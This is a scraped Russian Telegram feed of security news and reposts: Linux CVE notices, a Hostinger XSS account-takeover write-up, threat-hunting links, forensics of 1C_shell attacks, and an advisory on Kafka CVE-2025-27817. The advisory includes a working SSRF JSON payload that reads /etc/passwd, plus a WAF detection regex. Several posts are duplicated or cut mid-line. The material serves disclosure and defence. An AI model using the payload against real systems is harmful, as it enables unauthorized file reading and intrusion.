www.opennet.ru
Arch Linux перешёл на 64-разрядные сборки Wine (WoW64)
Разработчики дистрибутива Arch Linux объявили о сборке по умолчанию Wine и Wine-Staging в режиме Wow64 (64-bit Windows-on-Windows), обеспечивающем выполнение 32-разрядных Windows-приложений в 64-разрядных Unix-системах. Поставка 64-разрядных сборок Wine позволила…
🔗Ссылка:
https://opennet.ru/63418/
https://opennet.ru/63418/
Forwarded from Репорты простым языком
💥 Захват аккаунта Hostinger в один клик: разбор красивой цепочки уязвимостей
Сегодня разберем элегантный кейс от ресерчера aziz0x48, который привел к 1-Click Account Takeover. Идеальный пример того, как одна маленькая брешь в доверии рушит всю защиту.
⛓️ Все началось с классического Open Redirect на домене аутентификации
⚙️ На поддомене
– Жертва переходит по ссылке атакующего.
–
– На уязвимой странице срабатывает XSS, который простым fetch отправляет весь
– Профит! Токен в руках, его можно обменять на полноценный JWT и получить полный доступ к аккаунту.
🗣 Особенно интересна коммуникация с командой безопасности. Изначально они пытались понизить критичность, ссылаясь на то, что
В итоге команда Hostinger согласилась и исправила уязвимость.
🎓 Главный вывод: Доверие должно быть подкреплено проверкой. Наличие поддомена в вайтлисте не делает его автоматически безопасным. Любая доверенная сущность — это часть вашей поверхности атаки.
🔗 Полный разбор кейса читайте на нашем сайте:
eh.su/reports/124
Сегодня разберем элегантный кейс от ресерчера aziz0x48, который привел к 1-Click Account Takeover. Идеальный пример того, как одна маленькая брешь в доверии рушит всю защиту.
⛓️ Все началось с классического Open Redirect на домене аутентификации
auth.hostinger.com. Как мы знаем, сам по себе он часто имеет низкий импакт. Но здесь была одна важная деталь: в белом списке разрешенных доменов для редиректа находился поддомен marketing.hostinger.com. Именно он и стал слабым звеном.⚙️ На поддомене
marketing.hostinger.com обнаружилась Reflected XSS через параметр redirect_url. В итоге получилась убийственная цепочка:– Жертва переходит по ссылке атакующего.
–
auth.hostinger.com видит, что пользователь залогинен, добавляет в URL временный auth-token и редиректит его на "доверенный" marketing.hostinger.com.– На уязвимой странице срабатывает XSS, который простым fetch отправляет весь
window.location (вместе с токеном) на сервер злоумышленника.– Профит! Токен в руках, его можно обменять на полноценный JWT и получить полный доступ к аккаунту.
🗣 Особенно интересна коммуникация с командой безопасности. Изначально они пытались понизить критичность, ссылаясь на то, что
marketing.hostinger.com — стороннее приложение вне скоупа. Ресерчер грамотно парировал: Если ваш основной сервис доверяет поддомену и перенаправляет на него чувствительные данные, то с точки зрения безопасности это ваша проблема.
В итоге команда Hostinger согласилась и исправила уязвимость.
🎓 Главный вывод: Доверие должно быть подкреплено проверкой. Наличие поддомена в вайтлисте не делает его автоматически безопасным. Любая доверенная сущность — это часть вашей поверхности атаки.
🔗 Полный разбор кейса читайте на нашем сайте:
eh.su/reports/124
www.opennet.ru
Релиз среды рабочего стола KDE Plasma 6.4
После четырёх месяцев разработки опубликован релиз среды рабочего стола KDE Plasma 6.4. Для оценки работы новых выпусков KDE можно воспользоваться сборками от проектов KDE Neon и openSUSE (Argon, основанный на openSUSE Leap, и Krypton, основанный на openSUSE…
🔗Ссылка:
https://opennet.ru/63421/
https://opennet.ru/63421/
Forwarded from 1N73LL1G3NC3
BloodHound Query Library
A collection of Cypher queries designed to help BloodHound users to unlock the full potential of the BloodHound platform by creating an open query ecosystem.
Blog: https://specterops.io/blog/2025/06/17/introducing-the-bloodhound-query-library/
A collection of Cypher queries designed to help BloodHound users to unlock the full potential of the BloodHound platform by creating an open query ecosystem.
Blog: https://specterops.io/blog/2025/06/17/introducing-the-bloodhound-query-library/
👍1🔥1
Forwarded from Threat Hunting Father 🦔
Hunting Through APIs 🐱
In today’s blog, we’re diving into the world of hunting through APIs. In the blog, the advantages, limitations, and scopes of the Graph API, Azure Monitor API, and Defender ATP API are discussed. For all of these solutions, a ready-to-use PowerShell script is shared.
These APIs can enhance security operations, automate threat detection, and enable bigger automation potential. In this blog the following topics are discussed:
- Available Data
- Permissions
- API Limitations
- Hunting Through PowerShell
- Hunting the Hunters
The next blog explains how these APIs can be used in Logic Apps, so stay tuned for the next one!
🔗 https://kqlquery.com/posts/hunting-api-kql/
🦔 THF
In today’s blog, we’re diving into the world of hunting through APIs. In the blog, the advantages, limitations, and scopes of the Graph API, Azure Monitor API, and Defender ATP API are discussed. For all of these solutions, a ready-to-use PowerShell script is shared.
These APIs can enhance security operations, automate threat detection, and enable bigger automation potential. In this blog the following topics are discussed:
- Available Data
- Permissions
- API Limitations
- Hunting Through PowerShell
- Hunting the Hunters
The next blog explains how these APIs can be used in Logic Apps, so stay tuned for the next one!
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Четыре луча
SSRF в Apache Kafka Client CVE-2025-27817
CVE-2025-27817 обнаружена в Apache Kafka Client и затрагивает механизм аутентификации SASL/OAUTHBEARER. Эта уязвимость позволяет злоумышленнику указать произвольные значения параметров sasl.oauthbearer.token.endpoint.url и sasl.oauthbearer.jwks.endpoint.url, что может привести к реализации SSRF.
❗️Уязвимы версии 3.1.0 – 3.9.0 — рекомендуем обновиться.
Метрики
Описание уязвимости
Kafka Client позволяет указать URL-адреса в конфигурации:
sasl.oauthbearer.token.endpoint.url —это параметр конфигурации в Apache Kafka Client, который указывает URL-адрес сервера аутентификации OAuthBearer, откуда клиент должен получить токен доступа.
sasl.oauthbearer.jwks.endpoint.url —это параметр конфигурации Apache Kafka Client, который указывает URL для получения JWKS (JSON Web Key Set) — набора ключей, используемых для проверки подписанных OAuth токенов.
Проблема
Kafka не ограничивает допустимые схемы URL — можно подставить:
Пример эксплойта
В данном запросе злоумышленник получит содержимое файла /etc/passwd через схему file. А в известном эксплоите обращение идет к эндроинту
Как защищаться
На WAF можно написать правило, которое контролировало содержимое ключей
Например подобным регулярным выражением
Возможные исключения: в схемах https, http отсутствие адресов, недоступных для внешних пользователей.
CVE-2025-27817 обнаружена в Apache Kafka Client и затрагивает механизм аутентификации SASL/OAUTHBEARER. Эта уязвимость позволяет злоумышленнику указать произвольные значения параметров sasl.oauthbearer.token.endpoint.url и sasl.oauthbearer.jwks.endpoint.url, что может привести к реализации SSRF.
❗️Уязвимы версии 3.1.0 – 3.9.0 — рекомендуем обновиться.
Метрики
Base core: 7,5 (High)
CWE: CWE 918
Описание уязвимости
Kafka Client позволяет указать URL-адреса в конфигурации:
sasl.oauthbearer.token.endpoint.urlsasl.oauthbearer.jwks.endpoint.urlsasl.oauthbearer.token.endpoint.url —
sasl.oauthbearer.jwks.endpoint.url —
Проблема
Kafka не ограничивает допустимые схемы URL — можно подставить:
file:// → приведёт к чтению локального файла и логированию его содержимого.http:// или https:// → позволяет сделать запрос к произвольному серверу, в том числе во внутренней сети → SSRF.Пример эксплойта
{
"type": "kafka",
"spec": {
"type": "kafka",
"ioConfig": {
"type": "kafka",
"consumerProperties": {
"bootstrap.servers": "127.0.0.1:1337",
"sasl.mechanism": "OAUTHBEARER",
"security.protocol": "SASL_SSL",
"sasl.login.callback.handler.class": "org.apache.kafka.common.security.oauthbearer.secured.OAuthBearerLoginCallbackHandler",
"sasl.oauthbearer.token.endpoint.url": "file:///etc/passwd",
"sasl.jaas.config": "org.apache.kafka.common.security.oauthbearer.OAuthBearerLoginModule required;"
},
"topic": "xx",
"useEarliestOffset": true
},
"dataSchema": {
"dataSource": "test"
}
}
}В данном запросе злоумышленник получит содержимое файла /etc/passwd через схему file. А в известном эксплоите обращение идет к эндроинту
/druid/indexer/v1/samplerКак защищаться
На WAF можно написать правило, которое контролировало содержимое ключей
sasl.oauthbearer.token.endpoint.url и sasl.oauthbearer.jwks.endpoint.url, что бы в них не передавались схемы http, ftp, php, https, file, data. Например подобным регулярным выражением
\"\s*sasl\.oauthbearer\.(token|jwks)\.endpoint\.url\s*\":\s*\"\s*(http:\/\/|https:\/\/|file:\/\/|php|data|ftp).*?\"
Возможные исключения: в схемах https, http отсутствие адресов, недоступных для внешних пользователей.
❤1
www.opennet.ru
Уязвимости в PAM и libblockdev, позволяющие получить права root в системе
Компания Qualys выявила уязвимость (CVE-2025-6019) в библиотеке libblockdev, позволяющую через манипуляции с фоновым процессом udisks получить права root в системе. Работа прототипа эксплоита продемонстрирована в Ubuntu, Debian, Fedora и openSUSE Leap 15.
🔗Ссылка:
https://opennet.ru/63424/
https://opennet.ru/63424/
Forwarded from Social Engineering
• Pivoting - один из этапов взлома, когда атакующий создает для себя точку опоры в скомпрометированной системе, плацдарм для дальнейшего проникновения. О приемах, которые для этого применяются, мы сегодня и поговорим. Гайд состоит из двух частей и включает следующую информацию:
• Часть 1:
• Часть 2:
• Дополнительно: Linux for Hackers. File Transfers - первая проблема, с которой атакующий сталкивается на этапе pivoting’а — это передача файлов. Порой нужно залить на удаленный хост эксплойт для повышения привилегий, скачать документ, дамп памяти, поднять прокси-сервер и т.д... Специфика передачи данных обусловлена необходимостью выполнить ее исключительно базовыми средствами ОС. О таких методах и средствах подробно будет описано в данной статье.
S.E. ▪️ infosec.work ▪️ VT
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1
Forwarded from AppSec Journey
azure pentest.pdf
1.1 MB
Ну куда без тестирования?
Прекрасный подручный гайд с техниками/тактиками на Azure (в целом, чуть-чуть интеллектуальных затрат и это можно не только под Azure адаптировать). Учитывая всякие клаудные матрицы и тд.. Тулкит для редтим, продуктовой безы и не только:)
Красиво, чего уж там!
Прекрасный подручный гайд с техниками/тактиками на Azure (в целом, чуть-чуть интеллектуальных затрат и это можно не только под Azure адаптировать). Учитывая всякие клаудные матрицы и тд.. Тулкит для редтим, продуктовой безы и не только:)
Красиво, чего уж там!
www.opennet.ru
Уязвимости в библиотеке libxml2, потенциально приводящие к выполнению кода
В библиотеке Libxml2, разрабатываемой проектом GNOME и применяемой для разбора содержимого в формате XML, выявлено 5 уязвимостей, две из которых потенциально могут привести к выполнению кода при обработке специально оформленных внешних данных. Библиотека…
🔗Ссылка:
https://opennet.ru/63431/
https://opennet.ru/63431/
Forwarded from ESCalator
По следам 1C_Shell. Расследуем атаки с помощью журнала регистрации 🐾
В одном из предыдущих постов мы писали об обнаружении атак на систему «1С», в которых злоумышленники использовали инструмент 1C_shell. Он представляет собой внешнюю обработку, позволяющую запустить произвольный код на сервере «1С:Предприятие».
Подобные атаки интересны тем, что оставляют мало очевидных следов в скомпрометированных системах. В частности, тяжело определить источник атаки, особенно в условиях ротации журналов событий Windows.
Одним из артефактов, которые могут нам помочь в расследовании, является журнал регистрации.
💡 Журнал регистрации — механизм в системе «1С», предназначенный для логирования действия пользователей, в том числе начала и завершения сессий.
Чтобы просмотреть журнал регистрации, перейдем в конфигуратор и на вкладке «Администрирование» выберем соответствующий пункт (скриншот 1).
В журнале, помимо всего прочего, мы можем увидеть события начала и завершения пользовательских сеансов (скриншот 2). Таким образом, зная временной промежуток, в рамках которого происходила вредоносная активность, мы определим подозрительные сессии. В рамках этих сессий злоумышленники могли выполнять команды.
Файлы журнала регистрации в случае клиент-серверного варианта информационной базы по умолчанию хранятся в рабочей папке кластера:
Логи имеют необычный формат и плохо пригодны для ручного анализа. О формате можно почитать в статье «Инфостарт»: описание актуально для «1С:Предприятия» версий 8.1 и 8.2, но с тех пор формат изменился незначительно.
💡 Актуальная структура журнала регистрации описана в Руководстве администратора «1С:Предприятия» — однако доступ к документу ограничен.
Для того чтобы распарсить файлы журнала регистрации, можно воспользоваться встроенной консольной утилитой ibcmd, предназначенной для администрирования сервера «1С». Она входит в комплект, поставляемый при установке «1С:Предприятия», и, начиная с версии 8.3.25, имеет функциональность для обработки файлов журнала регистрации.
Утилита расположена в папке
Документацию утилиты также можно найти в Руководстве администратора.
Для того чтобы распарсить журнал регистрации и на выходе получить файл формата JSONL, можно использовать следующую команду:
Пример выходной строки:
#ir #detect #dfir #malware
@ptescalator
В одном из предыдущих постов мы писали об обнаружении атак на систему «1С», в которых злоумышленники использовали инструмент 1C_shell. Он представляет собой внешнюю обработку, позволяющую запустить произвольный код на сервере «1С:Предприятие».
Подобные атаки интересны тем, что оставляют мало очевидных следов в скомпрометированных системах. В частности, тяжело определить источник атаки, особенно в условиях ротации журналов событий Windows.
Одним из артефактов, которые могут нам помочь в расследовании, является журнал регистрации.
Чтобы просмотреть журнал регистрации, перейдем в конфигуратор и на вкладке «Администрирование» выберем соответствующий пункт (скриншот 1).
В журнале, помимо всего прочего, мы можем увидеть события начала и завершения пользовательских сеансов (скриншот 2). Таким образом, зная временной промежуток, в рамках которого происходила вредоносная активность, мы определим подозрительные сессии. В рамках этих сессий злоумышленники могли выполнять команды.
Файлы журнала регистрации в случае клиент-серверного варианта информационной базы по умолчанию хранятся в рабочей папке кластера:
C:\Program Files\1cv8\srvinfo\reg_****\****\1Cv8Log
Логи имеют необычный формат и плохо пригодны для ручного анализа. О формате можно почитать в статье «Инфостарт»: описание актуально для «1С:Предприятия» версий 8.1 и 8.2, но с тех пор формат изменился незначительно.
💡 Актуальная структура журнала регистрации описана в Руководстве администратора «1С:Предприятия» — однако доступ к документу ограничен.
Для того чтобы распарсить файлы журнала регистрации, можно воспользоваться встроенной консольной утилитой ibcmd, предназначенной для администрирования сервера «1С». Она входит в комплект, поставляемый при установке «1С:Предприятия», и, начиная с версии 8.3.25, имеет функциональность для обработки файлов журнала регистрации.
Утилита расположена в папке
C:\Program Files\1cv8\<version>\bin. Папку можно скопировать и использовать на другом компьютере без необходимости устанавливать систему «1С».Документацию утилиты также можно найти в Руководстве администратора.
Для того чтобы распарсить журнал регистрации и на выходе получить файл формата JSONL, можно использовать следующую команду:
ibcmd.exe eventlog export -f json --skip-root -o C:\<output_path> \output.jsonl C:\<path_to_1Cv8Log>
Пример выходной строки:
{"ApplicationName":"1CV8C","ApplicationPresentation":"Тонкий клиент","Comment":"","Computer":"DESKTOP-QBF9N0A","Connection":"25","Data":null,"DataPresentation":"","Date":"2025-06-02T17:38:31","Event":"_$Session$_.Start","EventPresentation":"Сеанс. Начало","Level":"Information","Metadata":"00000000-0000-0000-0000-000000000000","MetadataPresentation":"<Не определено 00000000-0000-0000-0000-000000000000>","Port":"1560","ServerName":"WIN-UB4CFT0Q9FN","Session":"1","SessionDataSeparation":null,"SessionDataSeparationPresentation":null,"SyncPort":"0","TransactionID":"","TransactionStatus":"NotApplicable","User":"071523a4-516f-4fce-ba4b-0d11ab7a1893","UserName":""}
{"ApplicationName":"1CV8C","ApplicationPresentation":"Тонкий клиент","Comment":"","Computer":"DESKTOP-QBF9N0A","Connection":"0","Data":null,"DataPresentation":"","Date":"2025-06-02T17:38:57","Event":"_$Session$_.Finish","EventPresentation":"Сеанс. Завершение","Level":"Information","Metadata":"00000000-0000-0000-0000-000000000000","MetadataPresentation":"<Не определено 00000000-0000-0000-0000-000000000000>","Port":"0","ServerName":"","Session":"1","SessionDataSeparation":null,"SessionDataSeparationPresentation":null,"SyncPort":"0","TransactionID":"","TransactionStatus":"NotApplicable","User":"071523a4-516f-4fce-ba4b-0d11ab7a1893","UserName":""}
#ir #detect #dfir #malware
@ptescalator
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM